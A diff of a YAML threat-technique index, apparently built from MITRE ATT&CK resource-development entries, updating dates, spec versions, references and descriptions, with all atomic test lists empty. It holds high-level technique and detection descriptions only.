-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -108303,11 +108984,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -108343,7 +109023,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -108392,43 +109072,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -108441,18 +109090,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -108474,7 +109154,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -108490,8 +109170,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -108513,7 +109191,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -108533,8 +109211,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -108573,7 +109249,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -108594,8 +109270,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -108625,7 +109299,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -108662,8 +109336,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -108685,7 +109357,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -108707,8 +109379,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -108745,7 +109415,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -108767,8 +109437,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -108830,7 +109498,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -108852,7 +109519,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -108870,8 +109537,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -108906,7 +109571,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -108925,33 +109590,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -108961,10 +109624,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -108972,9 +109644,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -109025,11 +109696,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -109042,7 +109712,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -109077,22 +109747,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -109113,7 +109786,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -109152,6 +109825,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -109207,7 +109884,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -109265,7 +109941,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -109345,7 +110020,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -109405,7 +110079,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -109427,7 +110100,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -109446,42 +110119,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -109490,22 +110131,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
